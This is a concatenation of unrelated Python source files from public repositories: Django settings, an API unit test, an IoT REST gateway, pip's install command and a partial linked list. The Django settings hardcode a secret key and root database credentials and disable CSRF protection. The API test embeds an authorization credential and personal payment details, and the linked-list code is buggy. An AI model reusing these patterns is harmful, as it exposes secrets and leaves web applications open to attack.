4e6fbac8f8f71e065e2d9cc2501cba95fc32e1cb | d3c81d65d24b04745b3306419ff6d4151a2a22db | /django_project/django_project/settings.py | a620a8bb15b68c59ceaa8c13780f1c131da2a56d | [] | no_license | bianQ/begin | 88b2950057bfddb76c5859ce2089317b806ca6b1 | b94a80cdb32c38ed625dc24a8bf7872c6ff8d2ac | refs/heads/master | 2021-01-24T08:20:41.996011 | 2016-12-15T13:45:19 | 2016-12-15T13:45:19 | 69,145,608 | 4 | 1 | null | 2016-10-31T02:09:37 | 2016-09-25T05:27:22 | Python | UTF-8 | Python | false | false | 3,683 | py | """
Django settings for Blog project.
Generated by 'django-admin startproject' using Django 1.10.1.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'i(j^1)a7%obaef6&r_r!9y$!_c6amp72qu6it*yia58133xv6s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
#'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
'HOST': '192.168.1.103',
'USER': 'root',
'PASSWORD': 'root',
'NAME': 'django',
'CHARSET': 'utf8'
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'collectstatic')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, "static"),
)
LOGIN_URL = '/blog/login/'
DOMAIN = 'http://127.0.0.1:8000'
EMAIL_HOST = 'smtp.163.com'
EMAIL_HOST_USER = '15989490620@163.com'
EMAIL_HOST_PASSWORD = os.environ.get('PASSWORD')
EMAIL_PORT = 465
EMAIL_USE_SSL = True
BAIDU_MAP_KEY = os.environ.get('BAIDUMAPAK') | [
"vagaab@foxmail.com"
] | vagaab@foxmail.com |
afd81f81f1f1b883587446ae90c0eef7fe9119b6 | 7d02813987b49c2a69d92b9b2fdf5148af37274f | /case/Recommend/testAccountBind.py | bfa36a597587e27610642247da283901f0f4eb06 | [] | no_license | xgh321324/api_test | 29e01cbe5f0b7c2df25fb7e781cedf8031140c72 | 2575495baac3ab90adab7a7a85904c38a78dd4b7 | refs/heads/master | 2022-07-23T19:54:39.320828 | 2022-07-02T09:13:35 | 2022-07-02T09:13:35 | 129,185,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,803 | py | #coding:utf-8
from common.login_lanting import auto_login_by_UID
import requests,unittest,time,json
from common.logger import Log
from common.Hash import get_digit,get_sign
from common.Excel import Excel_util
class Account(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.s = requests.session()
cls.to = auto_login_by_UID()
cls.header = {'User-Agent': 'PelvicFloorPersonal/4.1.1 (iPad; iOS 10.1.1; Scale/2.00)',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-Hans-CN;q=1',
'Content-Type': 'application/json',
'requestApp': '2',
'requestclient': '2',
'versionForApp': '4.4.0',
'Authorization': 'Basic YXBpTGFudGluZ0BtZWRsYW5kZXIuY29tOkFwaVRobWxkTWxkQDIwMTM=',
'Connection': 'keep-alive'
}
cls.log = Log()
cls.excel = Excel_util(r'C:\Users\Administrator\Desktop\Interface_testcase.xls')
def test_bind_account01(self):
u'绑定提现账号接口'
self.log.info('开始测试绑定账号接口..')
url = 'http://api-rec.sunnycare.cc/v1/account/bind'
json_data = {
'token': self.to,
'timestamp': str(int(time.time())),
'alipay_account': '2088012687108144',
'real_name': '许广会',
'nick_name': '许广会',
'nonce': get_digit()
}
json_data['sign'] = get_sign(json_data)
r = self.s.post(url,headers = self.header,json=json_data)
self.log.info('绑定支付宝返回:%s' % r.json())
#断言
self.assertEqual(200,r.json()['code'],msg='返回状态码不是200')
self.assertEqual('请求成功',r.json()['note'])
self.log.info('绑定账号接口测试结束!\n')
def test_bind_account02(self):
u'解除绑定账号接口'
self.log.info('开始测试解除绑定账号接口..')
url = 'http://api-rec.sunnycare.cc/v1/account/unbind'
json_data = {
'token': self.to,
'timestamp': str(int(time.time())),
'type': '0',#0,支付宝;1,微信
'nonce': get_digit()
}
json_data['sign'] = get_sign(json_data)
r = self.s.post(url,headers = self.header,json=json_data)
self.log.info('解除绑定支付宝返回:%s' % r.json())
#断言
self.assertEqual(200,r.json()['code'],msg='返回状态码不是200')
self.assertEqual('请求成功',r.json()['note'])
self.log.info('解除绑定账号接口测试结束!\n')
@classmethod
def tearDownClass(cls):
cls.s.close()
if __name__=='__main__':
unittest.main()
| [
"34511103+xgh321324@users.noreply.github.com"
] | 34511103+xgh321324@users.noreply.github.com |
3711e6424cfd6ae391004f0cee24c8d5f0f81eaf | 2e7970e72e583b6e52cd2dc3b58fbb4a0437d610 | /web/restful_api/gateway_lib.py | f10821c4d6b672cbf9ae951dec1af103274b4ffc | [] | no_license | Lyoncore/iotivity-demo-uc15 | dedc25821f672a0b7ea0096fb9acd5651fa7a8e8 | 33d0d377f433029371403415f695226dad46349e | refs/heads/master | 2021-04-06T00:00:54.981699 | 2016-08-02T06:30:25 | 2016-08-02T06:30:25 | 64,462,533 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,575 | py | import socket
import math
import decimal
import time
from bottle import route, request, run
print 'create socket'
clientsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting to local gateway ...'
clientsock.connect(("127.0.0.1", 6655))
print 'Connected'
def read_data(data):
data = data.ljust(64)
#print data
clientsock.send(data)
value = clientsock.recv(64)
#print value
if not value:
print 'connection closed'
return None
else:
status = value.lstrip().rstrip()
#print status
return status
def send_data(name, value):
name = name.ljust(32)
value = value.ljust(32)
name = name + value
#print name
clientsock.send(name)
@route('/raspberrypi2/')
def list_device_p():
return "For raspberrypi2 control"
@route('/raspberrypi2/temperature', method='GET')
def read_temp_p():
name = 'sensor_p_temp'
return read_data(name)
@route('/raspberrypi2/humidity', method='GET')
def read_humidity_p():
name = 'sensor_p_humidity'
return read_data(name)
@route('/raspberrypi2/light', method='GET')
def read_light_p():
name = 'sensor_p_light'
return read_data(name)
@route('/raspberrypi2/sound', method='GET')
def read_sound_p():
name = 'sensor_p_sound'
return read_data(name)
@route('/raspberrypi2/led_red', method='GET')
def read_led_p_red():
name = 'led_p_red'
value = request.query.value
if not value:
return read_data(name)
else:
send_data(name, value)
@route('/raspberrypi2/led_green', method='GET')
def read_led_p_green():
name = 'led_p_green'
value = request.query.value
if not value:
return read_data(name)
else:
send_data(name, value)
@route('/raspberrypi2/led_blue', method='GET')
def read_led_p_blue():
name = 'led_p_blue'
value = request.query.value
if not value:
return read_data(name)
else:
send_data(name, value)
@route('/raspberrypi2/lcd', method='GET')
def read_lcd_p():
name = 'lcd_p'
value = request.query.value
if not value:
return read_data(name)
else:
send_data(name, value)
@route('/raspberrypi2/buzzer', method='GET')
def write_buzzer_p():
name = 'button_p'
value = request.query.value
if value:
send_data(name, value)
@route('/raspberrypi2/button', method='GET')
def read_button_p():
name = 'button_p'
return read_data(name)
@route('/raspberrypi2/ultrasonic', method='GET')
def read_ultrasonic_p():
name = 'sensor_p_ultrasonic'
return read_data(name)
@route('/arduino/')
def list_device_a():
return "For arduino control"
@route('/arduino/led', method='GET')
def read_led_a():
name = 'led_a'
value = request.query.value
if not value:
#print 'read'
return read_data(name)
else:
#print 'write'
send_data(name, value)
@route('/arduino/lcd', method='GET')
def read_lcd_a():
name = 'lcd_a'
value = request.query.value
if not value:
#print 'read'
return read_data(name)
else:
#print 'write'
send_data(name, value)
@route('/arduino/buzzer', method='GET')
def read_buzzer_a():
name = 'buzzer_a'
value = request.query.value
if value:
send_data(name, value)
@route('/arduino/button', method='GET')
def read_button_a():
name = 'button_a'
return read_data(name)
@route('/arduino/touch', method='GET')
def read_touch_a():
name = 'touch_a'
return read_data(name)
run(host='localhost', port=5566, debug=True)
| [
"gerald.yang@canonical.com"
] | gerald.yang@canonical.com |
deee523d6c83e8a7be439c8b330ff4bdc6289531 | babe4f137193012d4d31107411b91295eaae631c | /teams/admin.py | f407e791e330c818d8517df00259ca7f97b5e624 | [] | no_license | dev-yohan/football_bets | 31829f73e9b9b3780c2bb32825c62456f39eb025 | fc5215ebca1bc9c31529a58fc5d66b92d49412c9 | refs/heads/master | 2021-01-19T10:42:30.241938 | 2014-10-02T21:56:02 | 2014-10-02T21:56:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 162 | py | from django.contrib import admin
# Register your models here.
from teams.models import Team, TeamPhoto
admin.site.register(Team)
admin.site.register(TeamPhoto) | [
"yohanmorales@hotmail.com"
] | yohanmorales@hotmail.com |
2b9e767ea703a2e1d71f9537fdde748a266f4054 | 9652bfcb74c913471ff22fe2d5cea734e3bd3b4d | /snippets/models.py | 55526d87a08d9b00859909dfc4d42378aa5b21a3 | [] | no_license | brandoshmando/api-practice | de4037a64b244d3cfeae688e8a63e4ab2f72a1dd | 9811c74dcf3a335a4899fb716e580082efb8464a | refs/heads/master | 2021-01-01T05:30:21.046513 | 2014-12-04T19:10:54 | 2014-12-04T19:10:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,592 | py | from django.db import models
from pygments.lexers import get_all_lexers, get_lexer_by_name
from pygments.styles import get_all_styles
from pygments.formatters.html import HtmlFormatter
from pygments import highlight
LEXERS = [item for item in get_all_lexers() if item[1]]
LANGUAGE_CHOICES = sorted([(item[1][0], item[0]) for item in LEXERS])
STYLE_CHOICES = sorted((item,item) for item in get_all_styles())
class Snippet(models.Model):
created = models.DateTimeField(auto_now_add=True)
title = models.CharField(max_length=100, blank=True, default='')
code = models.TextField()
linenos = models.BooleanField(default=False)
language = models.CharField(choices=LANGUAGE_CHOICES,
default='python',
max_length=100)
style = models.CharField(choices=STYLE_CHOICES,
default='friendly',
max_length=100)
owner = models.ForeignKey('auth.User', related_name='snippets')
highlighted = models.TextField()
class Meta:
ordering = ('created',)
def __unicode__(self):
return self.title
def save(self, *args, **kwargs):
"""
Use the 'pygments' library to create a highlighted section of the code snippet
"""
lexer = get_lexer_by_name(self.language)
linenos = self.linenos and 'table' or False
options = self.title and {'title': self.title} or {}
formatter = HtmlFormatter(style=self.style, linenos=linenos, full=True, **options)
self.highlighted = highlight(self.code, lexer, formatter)
super(Snippet, self).save(*args, **kwargs) | [
"brancraft@gmail.com"
] | brancraft@gmail.com |
4931a443320347645e710cbea6266b44e13b80be | 59303d668ccf4126deb9c18c254a4ccc36e7b39f | /app/core/tests/test_commands.py | cc84d9ab8956b94e14493543f7196557d7ddba11 | [
"MIT"
] | permissive | tp00012x/playground | 708cb8ce8900ec65a1c8b3fc329397b79d8a415e | a4d22ad812ac8f45996f767b87130ba41ec69154 | refs/heads/master | 2021-09-24T19:13:31.885114 | 2020-02-07T23:11:28 | 2020-02-07T23:20:50 | 213,700,804 | 0 | 0 | MIT | 2021-09-22T18:01:04 | 2019-10-08T16:54:15 | Python | UTF-8 | Python | false | false | 687 | py | from unittest.mock import patch
from django.core.management import call_command
from django.db.utils import OperationalError
from django.test import TestCase
class CommandTests(TestCase):
@patch('django.db.utils.ConnectionHandler.__getitem__')
def test_wait_for_db_ready(self, gi):
gi.return_value = True
call_command('wait_for_db')
self.assertEqual(gi.call_count, 1)
@patch('django.db.utils.ConnectionHandler.__getitem__')
@patch('time.sleep', return_value=True)
def test_wait_for_db(self, ts, gi):
gi.side_effect = [OperationalError] * 5 + [True]
call_command('wait_for_db')
self.assertEqual(gi.call_count, 6)
| [
"anthony_torres01@yahoo.com"
] | anthony_torres01@yahoo.com |
830e286274014b2ff90220d36601f1a1b0eb253a | 1dedbb7bdb2822668838194f9adc8f2b0d9f629f | /mbta_departures/departures/migrations/0002_auto_20160823_2159.py | a7811666ee1d52817db44ebf58306b662952b09f | [] | no_license | mbc1990/mbta-departures | ce689371fa68a2bd72e6a68299c7bc746210f22a | 923a59dfe8346978a157600b21885d443ae0182d | refs/heads/master | 2020-09-17T04:43:52.189341 | 2016-08-26T14:10:04 | 2016-08-26T14:10:04 | 66,392,832 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10 on 2016-08-23 21:59
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('departures', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='departure',
name='track',
field=models.IntegerField(null=True),
),
]
| [
"mbalchcr@oberlin.edu"
] | mbalchcr@oberlin.edu |
e59cd9e09e8d6164ac0af82e2ef6a000c9621621 | 09e4f72af3356544bb56ffaa62ba85000fbe8b92 | /venv/Lib/site-packages/pip-10.0.1-py3.7.egg/pip/_internal/commands/install.py | 2d63579913858736448af3822bfecf4445c2c38b | [] | no_license | myjiangxiuhan/auto | e8e2e796507268c8536046a36f43c1fcdbabe0fb | 40180fb827e4018db6495c7052e3b5c3d9c90020 | refs/heads/master | 2020-04-29T16:26:59.251023 | 2019-03-18T10:39:17 | 2019-03-18T10:39:17 | 176,260,537 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,770 | py | from __future__ import absolute_import
import errno
import logging
import operator
import os
import shutil
from optparse import SUPPRESS_HELP
from pip._internal import cmdoptions
from pip._internal.basecommand import RequirementCommand
from pip._internal.cache import WheelCache
from pip._internal.exceptions import (
CommandError, InstallationError, PreviousBuildDirError,
)
from pip._internal.locations import distutils_scheme, virtualenv_no_global
from pip._internal.operations.check import check_install_conflicts
from pip._internal.operations.prepare import RequirementPreparer
from pip._internal.req import RequirementSet, install_given_reqs
from pip._internal.resolve import Resolver
from pip._internal.status_codes import ERROR
from pip._internal.utils.filesystem import check_path_owner
from pip._internal.utils.misc import ensure_dir, get_installed_version
from pip._internal.utils.temp_dir import TempDirectory
from pip._internal.wheel import WheelBuilder
try:
import wheel
except ImportError:
wheel = None
logger = logging.getLogger(__name__)
class InstallCommand(RequirementCommand):
"""
Install packages from:
- PyPI (and other indexes) using requirement specifiers.
- VCS project urls.
- Local project directories.
- Local or remote source archives.
pip also supports installing from "requirements files", which provide
an easy way to specify a whole environment to be installed.
"""
name = 'install'
usage = """
%prog [options] <requirement specifier> [package-index-options] ...
%prog [options] -r <requirements file> [package-index-options] ...
%prog [options] [-e] <vcs project url> ...
%prog [options] [-e] <local project path> ...
%prog [options] <archive url/path> ..."""
summary = 'Install packages.'
def __init__(self, *args, **kw):
super(InstallCommand, self).__init__(*args, **kw)
cmd_opts = self.cmd_opts
cmd_opts.add_option(cmdoptions.requirements())
cmd_opts.add_option(cmdoptions.constraints())
cmd_opts.add_option(cmdoptions.no_deps())
cmd_opts.add_option(cmdoptions.pre())
cmd_opts.add_option(cmdoptions.editable())
cmd_opts.add_option(
'-t', '--target',
dest='target_dir',
metavar='dir',
default=None,
help='Install packages into <dir>. '
'By default this will not replace existing files/folders in '
'<dir>. Use --upgrade to replace existing packages in <dir> '
'with new versions.'
)
cmd_opts.add_option(
'--user',
dest='use_user_site',
action='store_true',
help="Install to the Python user install directory for your "
"platform. Typically ~/.local/, or %APPDATA%\\Python on "
"Windows. (See the Python documentation for site.USER_BASE "
"for full details.)")
cmd_opts.add_option(
'--no-user',
dest='use_user_site',
action='store_false',
help=SUPPRESS_HELP)
cmd_opts.add_option(
'--root',
dest='root_path',
metavar='dir',
default=None,
help="Install everything relative to this alternate root "
"directory.")
cmd_opts.add_option(
'--prefix',
dest='prefix_path',
metavar='dir',
default=None,
help="Installation prefix where lib, bin and other top-level "
"folders are placed")
cmd_opts.add_option(cmdoptions.build_dir())
cmd_opts.add_option(cmdoptions.src())
cmd_opts.add_option(
'-U', '--upgrade',
dest='upgrade',
action='store_true',
help='Upgrade all specified packages to the newest available '
'version. The handling of dependencies depends on the '
'upgrade-strategy used.'
)
cmd_opts.add_option(
'--upgrade-strategy',
dest='upgrade_strategy',
default='only-if-needed',
choices=['only-if-needed', 'eager'],
help='Determines how dependency upgrading should be handled '
'[default: %default]. '
'"eager" - dependencies are upgraded regardless of '
'whether the currently installed version satisfies the '
'requirements of the upgraded package(s). '
'"only-if-needed" - are upgraded only when they do not '
'satisfy the requirements of the upgraded package(s).'
)
cmd_opts.add_option(
'--force-reinstall',
dest='force_reinstall',
action='store_true',
help='Reinstall all packages even if they are already '
'up-to-date.')
cmd_opts.add_option(
'-I', '--ignore-installed',
dest='ignore_installed',
action='store_true',
help='Ignore the installed packages (reinstalling instead).')
cmd_opts.add_option(cmdoptions.ignore_requires_python())
cmd_opts.add_option(cmdoptions.no_build_isolation())
cmd_opts.add_option(cmdoptions.install_options())
cmd_opts.add_option(cmdoptions.global_options())
cmd_opts.add_option(
"--compile",
action="store_true",
dest="compile",
default=True,
help="Compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-compile",
action="store_false",
dest="compile",
help="Do not compile Python source files to bytecode",
)
cmd_opts.add_option(
"--no-warn-scripts-location",
action="store_false",
dest="warn_script_location",
default=True,
help="Do not warn when installing scripts outside PATH",
)
cmd_opts.add_option(
"--no-warn-conflicts",
action="store_false",
dest="warn_about_conflicts",
default=True,
help="Do not warn about broken dependencies",
)
cmd_opts.add_option(cmdoptions.no_binary())
cmd_opts.add_option(cmdoptions.only_binary())
cmd_opts.add_option(cmdoptions.no_clean())
cmd_opts.add_option(cmdoptions.require_hashes())
cmd_opts.add_option(cmdoptions.progress_bar())
index_opts = cmdoptions.make_option_group(
cmdoptions.index_group,
self.parser,
)
self.parser.insert_option_group(0, index_opts)
self.parser.insert_option_group(0, cmd_opts)
def run(self, options, args):
cmdoptions.check_install_build_global(options)
upgrade_strategy = "to-satisfy-only"
if options.upgrade:
upgrade_strategy = options.upgrade_strategy
if options.build_dir:
options.build_dir = os.path.abspath(options.build_dir)
options.src_dir = os.path.abspath(options.src_dir)
install_options = options.install_options or []
if options.use_user_site:
if options.prefix_path:
raise CommandError(
"Can not combine '--user' and '--prefix' as they imply "
"different installation locations"
)
if virtualenv_no_global():
raise InstallationError(
"Can not perform a '--user' install. User site-packages "
"are not visible in this virtualenv."
)
install_options.append('--user')
install_options.append('--prefix=')
target_temp_dir = TempDirectory(kind="target")
if options.target_dir:
options.ignore_installed = True
options.target_dir = os.path.abspath(options.target_dir)
if (os.path.exists(options.target_dir) and not
os.path.isdir(options.target_dir)):
raise CommandError(
"Target path exists but is not a directory, will not "
"continue."
)
# Create a target directory for using with the target option
target_temp_dir.create()
install_options.append('--home=' + target_temp_dir.path)
global_options = options.global_options or []
with self._build_session(options) as session:
finder = self._build_package_finder(options, session)
build_delete = (not (options.no_clean or options.build_dir))
wheel_cache = WheelCache(options.cache_dir, options.format_control)
if options.cache_dir and not check_path_owner(options.cache_dir):
logger.warning(
"The directory '%s' or its parent directory is not owned "
"by the current user and caching wheels has been "
"disabled. check the permissions and owner of that "
"directory. If executing pip with sudo, you may want "
"sudo's -H flag.",
options.cache_dir,
)
options.cache_dir = None
with TempDirectory(
options.build_dir, delete=build_delete, kind="install"
) as directory:
requirement_set = RequirementSet(
require_hashes=options.require_hashes,
)
try:
self.populate_requirement_set(
requirement_set, args, options, finder, session,
self.name, wheel_cache
)
preparer = RequirementPreparer(
build_dir=directory.path,
src_dir=options.src_dir,
download_dir=None,
wheel_download_dir=None,
progress_bar=options.progress_bar,
build_isolation=options.build_isolation,
)
resolver = Resolver(
preparer=preparer,
finder=finder,
session=session,
wheel_cache=wheel_cache,
use_user_site=options.use_user_site,
upgrade_strategy=upgrade_strategy,
force_reinstall=options.force_reinstall,
ignore_dependencies=options.ignore_dependencies,
ignore_requires_python=options.ignore_requires_python,
ignore_installed=options.ignore_installed,
isolated=options.isolated_mode,
)
resolver.resolve(requirement_set)
# If caching is disabled or wheel is not installed don't
# try to build wheels.
if wheel and options.cache_dir:
# build wheels before install.
wb = WheelBuilder(
finder, preparer, wheel_cache,
build_options=[], global_options=[],
)
# Ignore the result: a failed wheel will be
# installed from the sdist/vcs whatever.
wb.build(
requirement_set.requirements.values(),
session=session, autobuilding=True
)
to_install = resolver.get_installation_order(
requirement_set
)
# Consistency Checking of the package set we're installing.
should_warn_about_conflicts = (
not options.ignore_dependencies and
options.warn_about_conflicts
)
if should_warn_about_conflicts:
self._warn_about_conflicts(to_install)
# Don't warn about scripts install locations if
# --target has been specified
warn_script_location = options.warn_script_location
if options.target_dir:
warn_script_location = False
installed = install_given_reqs(
to_install,
install_options,
global_options,
root=options.root_path,
home=target_temp_dir.path,
prefix=options.prefix_path,
pycompile=options.compile,
warn_script_location=warn_script_location,
use_user_site=options.use_user_site,
)
possible_lib_locations = get_lib_location_guesses(
user=options.use_user_site,
home=target_temp_dir.path,
root=options.root_path,
prefix=options.prefix_path,
isolated=options.isolated_mode,
)
reqs = sorted(installed, key=operator.attrgetter('name'))
items = []
for req in reqs:
item = req.name
try:
installed_version = get_installed_version(
req.name, possible_lib_locations
)
if installed_version:
item += '-' + installed_version
except Exception:
pass
items.append(item)
installed = ' '.join(items)
if installed:
logger.info('Successfully installed %s', installed)
except EnvironmentError as error:
show_traceback = (self.verbosity >= 1)
message = create_env_error_message(
error, show_traceback, options.use_user_site,
)
logger.error(message, exc_info=show_traceback)
return ERROR
except PreviousBuildDirError:
options.no_clean = True
raise
finally:
# Clean up
if not options.no_clean:
requirement_set.cleanup_files()
wheel_cache.cleanup()
if options.target_dir:
self._handle_target_dir(
options.target_dir, target_temp_dir, options.upgrade
)
return requirement_set
def _handle_target_dir(self, target_dir, target_temp_dir, upgrade):
ensure_dir(target_dir)
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
lib_dir_list = []
with target_temp_dir:
# Checking both purelib and platlib directories for installed
# packages to be moved to target directory
scheme = distutils_scheme('', home=target_temp_dir.path)
purelib_dir = scheme['purelib']
platlib_dir = scheme['platlib']
data_dir = scheme['data']
if os.path.exists(purelib_dir):
lib_dir_list.append(purelib_dir)
if os.path.exists(platlib_dir) and platlib_dir != purelib_dir:
lib_dir_list.append(platlib_dir)
if os.path.exists(data_dir):
lib_dir_list.append(data_dir)
for lib_dir in lib_dir_list:
for item in os.listdir(lib_dir):
if lib_dir == data_dir:
ddir = os.path.join(data_dir, item)
if any(s.startswith(ddir) for s in lib_dir_list[:-1]):
continue
target_item_dir = os.path.join(target_dir, item)
if os.path.exists(target_item_dir):
if not upgrade:
logger.warning(
'Target directory %s already exists. Specify '
'--upgrade to force replacement.',
target_item_dir
)
continue
if os.path.islink(target_item_dir):
logger.warning(
'Target directory %s already exists and is '
'a link. Pip will not automatically replace '
'links, please remove if replacement is '
'desired.',
target_item_dir
)
continue
if os.path.isdir(target_item_dir):
shutil.rmtree(target_item_dir)
else:
os.remove(target_item_dir)
shutil.move(
os.path.join(lib_dir, item),
target_item_dir
)
def _warn_about_conflicts(self, to_install):
package_set, _dep_info = check_install_conflicts(to_install)
missing, conflicting = _dep_info
# NOTE: There is some duplication here from pip check
for project_name in missing:
version = package_set[project_name][0]
for dependency in missing[project_name]:
logger.critical(
"%s %s requires %s, which is not installed.",
project_name, version, dependency[1],
)
for project_name in conflicting:
version = package_set[project_name][0]
for dep_name, dep_version, req in conflicting[project_name]:
logger.critical(
"%s %s has requirement %s, but you'll have %s %s which is "
"incompatible.",
project_name, version, req, dep_name, dep_version,
)
def get_lib_location_guesses(*args, **kwargs):
scheme = distutils_scheme('', *args, **kwargs)
return [scheme['purelib'], scheme['platlib']]
def create_env_error_message(error, show_traceback, using_user_site):
"""Format an error message for an EnvironmentError
It may occur anytime during the execution of the install command.
"""
parts = []
# Mention the error if we are not going to show a traceback
parts.append("Could not install packages due to an EnvironmentError")
if not show_traceback:
parts.append(": ")
parts.append(str(error))
else:
parts.append(".")
# Spilt the error indication from a helper message (if any)
parts[-1] += "\n"
# Suggest useful actions to the user:
# (1) using user site-packages or (2) verifying the permissions
if error.errno == errno.EACCES:
user_option_part = "Consider using the `--user` option"
permissions_part = "Check the permissions"
if not using_user_site:
parts.extend([
user_option_part, " or ",
permissions_part.lower(),
])
else:
parts.append(permissions_part)
parts.append(".\n")
return "".join(parts).strip() + "\n"
| [
"my.jiangxiuhan@gmail.com"
] | my.jiangxiuhan@gmail.com |
43f8fa5dff5e58c84f01d534064729fb4c6cf333 | 9b249900af551d5ddbac664c15d4d0fc52432bea | /masterips | 6b63e100388de08fefbb2301d0e31002110c7fb5 | [] | no_license | faskiri/jupyterhub | 9960ab1fbc8039e88204b1425b32a057ed353c05 | 1244770f90da1c6050b29a090ac5d7bddf6a0ad4 | refs/heads/master | 2021-05-12T15:50:53.581028 | 2018-01-08T13:44:36 | 2018-01-10T18:27:50 | 116,994,965 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 913 | #!/usr/bin/env python
import subprocess
import json
def master_instances():
data = subprocess.check_output('aws cloudformation describe-stacks --stack-name JupyterHubStack'.split())
stack_id = None
for s in json.loads(data)['Stacks']:
stack_id = s['StackId']
break
data = subprocess.check_output([
'aws',
'ec2',
'describe-instances',
'--filters',
'Name=tag:aws:cloudformation:stack-id,Values=%s' % stack_id,
'Name=tag:swarm-node-type,Values=manager'
])
parsed = json.loads(data)
instances = []
for r in parsed['Reservations']:
for i in r['Instances']:
instances.append(i)
return instances
def master_ips():
ips = []
for mi in master_instances():
ips.append(mi['PublicIpAddress'])
return ips
if __name__ == '__main__':
for i in master_ips():
print i
| [
"faskiri@instartlogic.com"
] | faskiri@instartlogic.com | |
43d6164aebe7ebe405d45276d7a31bdb92e91173 | 273d950a3d07c3e39609893e2993fc7c0ffe91a5 | /app_trainer.py | 1a8f3efd740bd69187addb0bfd2e3d39adc0b249 | [] | no_license | ruralkan/machinelearningwebservices | 39912c75f7e67be93499c1244735e0227ecb008e | 3151d83dfa9bc334d87ad9367feffed3f0257385 | refs/heads/master | 2020-06-27T11:03:24.339744 | 2019-07-31T22:10:31 | 2019-07-31T22:10:31 | 199,935,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # Trains model on data and save it
# Model random forest classifier
# The pickle module implements binary protocols for serializing
# and de-serializing a Python object structure.
import pickle
import numpy as np
from util import get_data
from sklearn.ensemble import RandomForestClassifier
if __name__ == '__main__':
X, Y = get_data()
Ntrain = len(Y) // 4
Xtrain, Ytrain = X[:Ntrain], Y[:Ntrain]
model = RandomForestClassifier()
model.fit(Xtrain, Ytrain)
# just in case you're curious
Xtest, Ytest = X[Ntrain:], Y[Ntrain:]
print("test accuracy:", model.score(Xtest, Ytest))
with open('mymodel.pkl', 'wb') as f:
pickle.dump(model, f) | [
"ruralkan@gmail.com"
] | ruralkan@gmail.com |
56cfe94c34974098be5441d30e82c556d53a814e | 86a017dd4c8d4d77c511cc598190aaa9dc0ae3e8 | /data structure/mine_linked_list.py | 92ff136a59524e8fa5ebb2031ddd83e8e998da40 | [] | no_license | sungguenja/studying | fd7459eb9faa6488d7b63bf3884a92513daf3c54 | 719f4dfbda211c34de2a0c8cf3b9d3001f29fcec | refs/heads/master | 2023-08-17T13:46:44.343780 | 2023-08-10T11:55:15 | 2023-08-10T11:55:15 | 232,306,053 | 0 | 0 | null | 2022-12-16T10:53:26 | 2020-01-07T11:00:28 | Python | UTF-8 | Python | false | false | 1,711 | py | import mine_node
class LinkedList:
def __init__(self):
self.head = None
def isEmpty(self):
return self.top == None
def clear(self):
self.top = None
def push(self,item):
now_node = mine_node.Node(item,self.top)
self.top = now_node
def size(self):
node = self.top
count = 0
while node != None:
count += 1
node = node.link
return count
def getNode(self,position):
if position<0:
return None
node = self.head
while position>0 and node != None:
node = node.link
position -= 1
return node
def getValue(self,position):
node = self.getNode(position)
if node == None:
return None
else:
return node.data
def replace(self,item,position):
node = self.getNode(position)
if node != None:
node.data = item
def find(self,data):
node = self.head
